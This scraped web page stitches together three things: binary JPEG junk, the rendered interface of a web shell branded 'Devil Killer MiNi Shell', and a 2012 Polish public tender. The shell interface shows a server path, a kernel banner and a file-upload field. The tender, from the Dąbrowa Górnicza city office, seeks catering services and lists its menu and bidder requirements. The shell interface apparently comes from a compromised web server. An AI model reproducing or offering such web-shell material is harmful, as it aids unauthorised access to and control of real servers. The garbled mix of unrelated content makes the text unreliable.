JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/47028-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 47028 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Postępowanie o udzielenie zamówienia prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.), zwanej dalej Ustawą o wartości zamówienia poniżej 200.000,00 EUR.
2.Przedmiotem zamówienia jest świadczenie w roku bieżącym usług cateringowych dla Urzędu Miejskiego w Dąbrowie Górniczej. 
Świadczenie usług cateringowych będzie odbywało się sukcesywnie w okresie obowiązywania umowy w ramach organizowanych przez Zamawiającego spotkań okolicznościowych, imprez (w tym imprez plenerowych), konferencji/seminariów, zawodów oraz innych zaistniałych okoliczności np. akcji ratowniczych.
Przedmiot zamówienia obejmuje przygotowanie, dostawę, podanie wybranych z poniższego menu posiłków i napojów:
1.	Rosół z makaronem	250m
2.	Zupa krem borowikowa	250ml
3.	Zupa pomidorowa	250ml
4.	Zupa krem brokułowa	250ml
5.	Zupa krem cebulowa z grzankami	250ml
6.	Zupa krem z zielonego groszku 	250ml
7.	Zupa grochowa z kiełbasą	350ml
8.	Zupa grochowa	300ml
9.	Zupa gulaszowa	300ml
10.	Barszcz czerwony z krokietem (krokiet z kapustą i grzybami)	250ml
11.	Barszcz czerwony z uszkami (uszka z kapustą i grzybami)	250ml
12.	Barszcz czerwony	200ml
13.	Żurek wiejski (z kiełbasą i jajkiem)	350ml
14.	Kotlet schabowy	200g
15.	Polędwiczki wieprzowe w sosie kurkowym	200g
16.	Polędwiczki wieprzowe w sosie śmietanowo-borowikowym	200g
17.	Sznycel zapiekany z pomidorami i serem mozzarellą	200g
18.	Kotlet de volaille z serem i pieczarkami	200g
19.	Pieczone udko z kurczaka	200g
20.	Pierś z kurczaka smażona	200g
21.	Pierś z kurczaka nadziewana szpinakiem w sosie śmietanowym	200g
22.	Karp smażony (dzwonko)	200g
23.	Łosoś smażony (dzwonko)	200g
24.	Filet z łososia (grillowany)	200g
25.	Pstrąg smażony	200g
26.	Leczo z kiełbasą i papryką	300ml
27.	Boeuf Strogonow	300ml
28.	Gulasz po węgiersku	300ml
29.	Bogracz	300ml
30.	Bigos	300g
31.	Pieczonki (skład minimum: ziemniaki, marchewka, burak, cebula, kiełbasa, boczek)	300g
32.	Kiełbasa z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
33.	Karkówka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
34.	Szaszłyk mięsno-warzywny z grilla (łącznie z dodatkami: ketchup, musztarda, skład minimum: papryka, boczek, cebula, karkówka)	200g
35.	Kaszanka z grilla (łącznie z dodatkami: ketchup, musztarda)	200g
36.	Grillowany oscypek z żurawiną	35g
37.	Surówka z kapusty białej	150g
38.	Surówka z kapusty czerwonej	150g
39.	Surówka z kapusty kiszonej	150g
40.	Surówka colesław	150g
41.	Surówka z marchwi	150g
42.	Sałatka grecka (skład minimum: pomidor, ogórek zielony, oliwki, ser feta, sałata lodowa)	200g
43.	Sałatka z gyrosem (skład minimum: grillowany kurczak, kapusta pekińska, kukurydza konserwowa, ogórek konserwowy, papryka konserwowa, majonez)	200g
44.	Sałatka serowo-ananasowa (skład minimum: ser żółty, ananas, kukurydza konserwowa, szynka konserwowa, majonez)	200g
45.	Sałatka jarzynowa z majonezem (skład minimum: ziemniaki, marchew, jajko, groszek, ogórek kiszony, seler, pietruszka)	200g
46.	Kapusta zasmażana	150g
47.	Ziemniaki z wody	150g
48.	Ziemniaki smażone	150g
49.	Frytki	150g
50.	Dufinki	150g
51.	Kluski śląskie	150g
52.	Ryż na sypko	150g
53.	Ryż z warzywami (skład minimum: marchewka, cebula)	150g
54.	Warzywa z wody (skład minimum: brokuł, marchewka, kalafior, fasolka szparagowa)	150g
55.	Pierogi z kapustą i grzybami	150g
56.	Smalec swojski	1kg
57.	Ogórki kiszone	1kg
58.	Bułka zwykła pszenna duża	1 sztuka/90g
59.	Bułka zwykła pszenna kajzerka	1 sztuka/50g
60.	Chleb wiejski	1 kg
61.	Zestaw wędlin (10 różnych rodzajów m.in.: szynka, polędwica wieprzowa, polędwica drobiowa, salami, schab pieczony, karczek) z przybraniem	300g
62.	Roladki szynkowe z kremem chrzanowym	200g
63.	Schab nadziewany suszonymi śliwkami	200g
64.	Jajka faszerowane pieczarkami 	200g
65.	Zestaw serów (10 różnych rodzajów m.in.: gouda, camembert, brie, edam, cheddar) z przybraniem	300g
66.	Kanapki bankietowe na pieczywie razowym (różnych rodzajów: z serem, z szynką, warzywami )	1 sztuka/50g
67.	Koreczki  (różnych rodzajów:  z wędliną, warzywami, serem)	1 sztuka/25g
68.	Koreczki rybne (różnych rodzajów: z łososiem, śledziem itp.)	1 sztuka/25g
69.	Tartinki (krakers + dodatki różnych rodzajów: wędlina, ser, warzywa + dip)	1 sztuka/25g
70.	Pstrąg w galarecie	200g
71.	Ryba po grecku	200g
72.	Tymbalik drobiowy	100g
73.	Pikle warzywne (m.in.: ogórek konserwowy, marchew, cebula)	200g
74.	Ciasteczka bankietowe (różne rodzaje: kruche, z cukrem, z czekoladą, z nadzieniem, kokosowe itp.)	1kg
75.	Sernik po wiedeńsku	1kg
76.	Ciasto szarlotka	1kg
77.	Ciasto miodownik	1 kg
78.	Ciasto w-z	1kg
79.	Ciasto makowiec	1 kg
80.	Pączki z nadzieniem budyniowym lub marmoladą	1 sztuka/100g
81.	Bułka słodka z budyniem, serem, dżemem lub makiem	1 sztuka/ 90g
82.	Napoleonka z nadzieniem budyniowym	1kg
83.	Babeczka owocowa	1 sztuka/70g
84.	Talerz owoców (m.in.: jabłko, pomarańcza, kiwi, banan)	1kg
85.	Sok 100% (różnych rodzajów: pomarańczowy, jabłkowy, wieloowocowy, grapefruitowy itp.) typu Hortex lub równoważny	1 litr
86.	Woda mineralna niegazowana typu Nałęczowianka lub równoważna	1 litr
87.	Woda mineralna gazowana typu Nałęczowianka lub równoważna	1 litr
88.	Napój gazowany słodzony typu Coca-cola lub równoważny	1 litr
89.	Kawa rozpuszczalna (łącznie z dodatkami: cukier, mleczko do kawy w płynie) typu Jacobs lub równoważna	200ml
90.	Kawa z ekspresu ciśnieniowego (łącznie z dodatkami: cukier, mleczko do kawy w płynie)	200ml
91.	Herbata (łącznie z dodatkami: cukier, plasterek cytryny) typu Lipton lub równoważna	200ml
3.Zamawiający w ramach świadczenia usług cateringowych przewiduje m.in. następujące zlecenia:
- Spotkania Lokalnej Grupy Wsparcia projektu OP-ACT
ilość osób ok. 20 (każde spotkanie), przewidywany termin: luty oraz IV kwartał 2012r. (w sumie 2-3 spotkania)
- Obsługa delegacji z rumuńskiego miasta Medias
ilość osób ok.12, przewidywany termin 29.02.2012r.
- Zawody miejskie Sprawni jak żołnierze
ilość osób ok.100, przewidywany termin 01.03-27.04.2012r.
- Zawody rejonowe Sprawni jak żołnierze
ilość osób ok.100, przewidywany termin: 01.03-27.04.2012r.
- Światowy Dzień Zdrowia 
ilość osób ok. 100, przewidywany termin: kwiecień 2012r. 
- Spotkanie w ramach projektu Different Countries - Common Objectives
ilość os. ok. 60, przewidywany termin: maj 2012r.
- Samorządowy Turniej Bowlingowy o Puchar Prezydenta Miasta z okazji Dni Dąbrowy Górniczej 
ilość osób ok. 50, przewidywany termin: 25.05.2012r.
- Samorządowe zawody wędkarskie o Puchar Prezydenta Miasta z okazji Dni Dąbrowy Górniczej
ilość osób ok. 40, przewidywany termin: 27.05.2012r.
- Dni Dąbrowy Górniczej 
ilość osób ok. 200, przewidywany termin: 25-27.05.2012r.
- Spotkanie w ramach projektu z programu Młodzież w działaniu
ilość osób ok. 40, przewidywany termin: czerwiec 2012r.
- Zawody sportowo-pożarnicze 
ilość osób ok. 160, przewidywany termin: czerwiec 2012r.
- Dożynki Miejskie 
ilość osób ok. 500, przewidywany termin: 26.08.2012r.
- VI Międzynarodowy Konkurs Muzyczny im. M. Spisaka 
ilość osób ok. 30, przewidywany termin: 14-23.09.2012r., miejsce:Katowice
- Spotkanie w ramach projektu Korzenie gospodarki w Dąbrowie Górniczej - kapitał zagraniczny w historii miasta
ilość osób ok. 100, przewidywany termin: wrzesień 2012r.
- VI Mistrzostwa Pracowników Samorządowych i Radnych GZM
ilość osób ok. 300, przewidywany termin: październik 2012r.
- Spotkanie w ramach projektu Partnership Around the Oak
ilość osób ok. 30, przewidywany termin: październik 2012r.
- VII Dąbrowski Kiermasz Świąteczny
ilość osób ok. 400, przewidywany termin: 21.12.2012r.
- Spotkanie wigilijne Prezydenta Miasta z Zarządami Dąbrowskich Stowarzyszeń Sportowych
ilość osób ok. 60, przewidywany termin: grudzień 2012r.
- Spotkanie opłatkowe Prezydenta Miasta z Kołami Gospodyń Wiejskich
ilość osób ok. 140, przewidywany termin: grudzień 2012r.
- Spotkania Prezydenta Miasta z członkami Dąbrowskiej Rady Biznesu
ilość osób ok. 22 (każde spotkanie), przewidywany termin: jedno spotkanie w kwartale (w sumie 4 spotkania w 2012r.)
- Seminaria organizowane przez Biuro Rozwoju Miasta i Obsługi Inwestorów
ilość osób ok. 60 (każde seminarium), przewidywany termin: III i IV kwartał 2012r. (w sumie 2 seminaria)
- ewentualne akcje ratownicze
posiłki i napoje dla strażaków ochotników biorących udział w akcjach ratowniczo - gaśniczych oraz osób poszkodowanych w zdarzeniach
- inne zlecenia
4. Zamawiający zastrzega sobie prawo do niezrealizowania wszystkich zleceń wymienionych w pkt. 3.3.4. SIWZ, co Wykonawca przyjmuje do wiadomości i nie wnosi co do tego zastrzeżeń. Podane ilości osób oraz terminy są szacunkowe i uzależnione będą od faktycznych potrzeb Zamawiającego.
5. Usługi cateringowe będą świadczone w siedzibie Zamawiającego lub w miejscu przez Zamawiającego wyznaczonym na terenie Dąbrowy Górniczej za wyjątkiem VI Międzynarodowego Konkursu Muzycznego im. Michała Spisaka, który odbędzie się w Katowicach.
6. Ilość porcji oraz rodzaj posiłku i napojów każdorazowo będą określane i zlecane przez Zamawiającego telefonicznie, faksem lub e-mailem z co najmniej 2 dniowym wyprzedzeniem z podaniem terminu, miejsca, sposobu podania oraz godziny podania posiłków i napojów.
7. Ilość porcji oraz rodzaj posiłku i napojów w przypadku akcji ratowniczych  będą określane i zlecane przez Zamawiającego telefonicznie z co najmniej 4 godzinnym wyprzedzeniem z podaniem miejsca i godziny podania posiłków i napojów. 
8. Posiłki winny być świeże, I gatunku i przygotowane przez Wykonawcę wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych.
9. Posiłki nie mogą być wykonane z produktów typu instant (np. zupy w proszku sosy, itp.) oraz produktów gotowych (np. mrożone pierogi itp.)
10. Posiłki i napoje winny być dostarczone przez Wykonawcę jego transportem, na miejsce wskazane przez Zamawiającego, najpóźniej na 30 minut przed ustalonymi z Zamawiającym godzinami. 
11. Wykonawca odpowiada za transport przedmiotu zamówienia, przygotowanie oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie o bezpieczeństwie żywności i żywienia.
12. Stoły winny być przygotowane przez Wykonawcę w sposób ustalony każdorazowo 
z Zamawiającym .
13. Posiłki  typu zimna płyta winny być podane najpóźniej na 15 minut przed ustalonymi z Zamawiającym godzinami.
14. Posiłki i napoje winny być podane w sposób estetyczny.
15. Posiłki i napoje winny być podawane  przez obsługę kelnerską Wykonawcy.
16. Wykonawca w zależności od ilości osób uczestniczących w spotkaniu czy innym zdarzeniu o którym mowa w pkt. 3.3.4. SIWZ zapewni każdorazowo do obsługi od 1 do 10 osób.
17.Posprzątanie stołów, zebranie naczyń oraz resztek pokonsumpcyjnych należy do Wykonawcy i winno się odbyć niezwłocznie po zakończeniu spotkania czy innego zdarzenia o którym mowa w pkt. 3.3.4. SIWZ.
18.Podanie posiłków i napojów (w zależności od okazji): w zastawie ceramicznej/porcelanowej z użyciem sztućców ze stali nierdzewnej, serwetek i obrusów materiałowych, w szklankach literatkach, filiżankach itp. lub w naczyniach jednorazowych z użyciem sztućców, serwetek i obrusów  jednorazowych zależy od wyboru Zamawiającego. 
19.Użyta zastawa (w tym m.in. nakrycie stołów, dekoracje) oraz w przypadku zaistnienia takiej potrzeby stoły dostarczone przez Wykonawcę winny być czyste i nieuszkodzone.
20.Posiłki winny być przygotowane zgodnie z ustalonym przez Zamawiającego menu.
21.Wykonawca zobowiązuje się na bieżąco uwzględnić ewentualne sugestie i życzenia Zamawiającego dotyczące sposobu realizacji złożonych przez Zamawiającego zleceń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie art. 67 ust.1 pkt. 6 Ustawy.  
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym opisem przedmiotu zamówienia i określonym kodem CPV do wartości 20% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną Decyzję o zatwierdzeniu zakładu i o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, pozwalającą na prowadzenie działalności w zakresie usług cateringowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.: 
- min. 1 usługę cateringową polegającą na obsłudze dużych imprez plenerowych typu festyny, pikniki, dożynki, dni miast, imprezy rekreacyjno-sportowe itp. o wartości minimum 8.000,00 zł brutto,
- min. 1 usługę cateringową polegającą na obsłudze imprez okolicznościowych typu koncerty, konkursy, jubileusze, bankiety, spotkania integracyjne itp. o wartości minimum 7.000,00 zł brutto,
- min. 1 usługę cateringową polegającą na obsłudze konferencji, seminariów, szkoleń, wykładów, delegacji itp. o wartości minimum 2.000,00 zł brutto.
Uwagi: 
1. Jeżeli zakres wskazanych i udokumentowanych, przez Wykonawcę w wykazie, usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać zakres i wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie, ocena spełniania warunku zostanie dokonana na podstawie żądanego oświadczenia z art. 22 ust. 1 Ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty  należy załączyć:
1.   Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. Próbki oferowanych potraw.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


